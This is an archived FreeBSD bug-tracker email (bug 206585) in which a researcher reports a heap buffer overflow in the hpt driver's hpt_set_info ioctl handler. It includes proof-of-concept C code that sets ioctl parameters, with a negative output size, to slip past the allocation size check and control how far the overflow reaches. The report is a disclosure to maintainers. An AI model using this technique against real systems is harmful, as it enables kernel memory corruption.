Date: Mon, 25 Jan 2016 19:38:35 +0000 From: bugzilla-noreply@freebsd.org To: freebsd-bugs@FreeBSD.org Subject: [Bug 206585] hpt_set_info possible buffer overflow Message-ID: <bug-206585-8-5zQ7GO3tO2@https.bugs.freebsd.org/bugzilla/> In-Reply-To: <bug-206585-8@https.bugs.freebsd.org/bugzilla/> References: <bug-206585-8@https.bugs.freebsd.org/bugzilla/>
next in thread | previous in thread | raw e-mail | index | archive | help
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D206585 --- Comment #4 from CTurt <ecturt@gmail.com> --- Supplying the `HPT_IOCTL_GET_EVENT` command will ensure that `Kernel_DeviceIoControl` function instantly returns, resulting in `hpt_set_info` returning straight after doing the `malloc`, `copyin`, and `free`: case HPT_IOCTL_GET_EVENT: { PHPT_EVENT pInfo; if (nInBufferSize!=3D0) return -1; I've also refined the `size` related parameters needed to fully control the heap overflow: params.dwIoControlCode =3D HPT_IOCTL_GET_EVENT; params.lpInBuffer =3D mapping; params.nInBufferSize =3D bufferSize + overflowSize; params.lpOutBuffer =3D NULL; params.nOutBufferSize =3D -overflowSize; params.lpBytesReturned =3D &bytesReturned; printf(" [+] nInBufferSize (size copied in): %08x\n", params.nInBufferSize); printf(" [+] nOutBufferSize: %08x\n", params.nOutBufferSize); printf(" [+] Sum (allocation size): %08x\n", params.nInBufferSize + params.nOutBufferSize); printf(" [+] Will be accepted: %d\n", (params.nInBufferSize + params.nOutBufferSize) <=3D PAGE_SIZE); You can get very manageable sizes from this, for example, allocated `bufferSize` of `0x500`, and copy size of `0x1000`. I'll try to get around to writing a full exploit for this soon, but won't be very useful since the vulnerability is only triggerable as `root` anyway. --=20 You are receiving this mail because: You are the assignee for the bug.=
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-206585-8-5zQ7GO3tO2>